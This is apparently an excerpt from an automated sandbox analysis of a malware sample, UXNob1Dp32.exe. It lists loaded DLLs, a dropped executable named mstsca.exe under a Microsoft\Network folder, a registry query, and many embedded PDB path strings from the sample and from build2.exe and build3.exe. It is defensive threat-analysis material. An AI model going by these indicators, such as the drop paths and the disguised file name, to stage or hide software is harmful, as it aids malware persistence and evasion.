Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: UXNob1Dp32.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\l* source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2121514211.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141866780.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140711382.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142950234.00000000034D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ation source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\W source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\U source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\cs\ source: UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\0 source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\\l7+P8 source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\ source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\App source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\R source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[C source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\p\s\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@qKDX source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$FSS source: UXNob1Dp32.exe, 00000005.00000003.2175321525.0000000003765000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\C:\U source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153154383.0000000003481000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.0000000003394000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\75\s source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\% source: UXNob1Dp32.exe, 00000005.00000003.2171274137.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\c source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\rj source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\WebVi source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: UXNob1Dp32.exe, 00000005.00000003.2170035395.0000000003457000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151477986.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171481315.000000000348D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2169860654.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098524116.0000000003364000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ D source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqqrW source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
